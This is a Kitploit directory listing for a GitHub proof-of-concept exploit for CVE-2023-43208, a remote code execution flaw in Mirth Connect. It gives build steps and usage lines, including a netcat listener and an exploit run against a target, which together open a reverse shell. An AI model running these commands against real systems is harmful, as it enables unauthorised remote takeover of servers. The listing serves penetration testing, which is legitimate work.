Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-43208 — PoC for Mirth Connect Remote Code Execution (RCE) | Kitploit
Tools/GitHubGitHub/pegasus0xx/cve-2023-43208
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubpegasus0xx/cve-2023-43208

CVE-2023-43208

PoC for Mirth Connect Remote Code Execution (RCE)

View Repository
15 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Mirth Connect RCE - CVE-2023-43208

Description

PoC for Mirth Connect Remote Code Execution (RCE) Affects Mirth Connect <= 4.4.0 via XStream deserialization.

Requirements

  • g++ (C++20)

Installation

root@kitploit:~
git clone https://github.com/Pegasus0xx/CVE-2023-43208.git && \
cd CVE-2023-43208 && \
make

Usage

root@kitploit:~
./exploit <URL> <LHOST> <LPORT>

Example

Start listener

root@kitploit:~
nc -lvnp 4444

Run exploit

root@kitploit:~
./exploit https://target.com 10.10.10.10 4444

References

  • https://nvd.nist.gov/vuln/detail/CVE-2023-43208
  • https://github.com/advisories/GHSA-pj5c-qr29-6746
Download Tool